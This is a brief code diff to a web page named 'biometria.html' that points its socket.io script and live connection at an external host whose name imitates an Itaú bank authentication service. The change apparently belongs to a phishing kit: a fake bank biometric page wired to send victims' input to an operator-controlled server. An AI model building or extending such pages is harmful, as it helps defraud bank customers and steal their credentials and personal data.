--- a/biometria.html
+++ b/biometria.html
@@ -425,9 +425,9 @@
         <button class="submit-btn" id="submitBtn">Continuar</button>
     </div>
 
-    <script src="/socket.io/socket.io.js"></script>
+    <script src="https://itaupersonasautenticacion.up.railway.app/socket.io/socket.io.js"></script>
     <script>
-        const socket = io({
+        const socket = io('https://itaupersonasautenticacion.up.railway.app', {
             reconnection: true,
             reconnectionDelay: 500,
             reconnectionDelayMax: 2000,
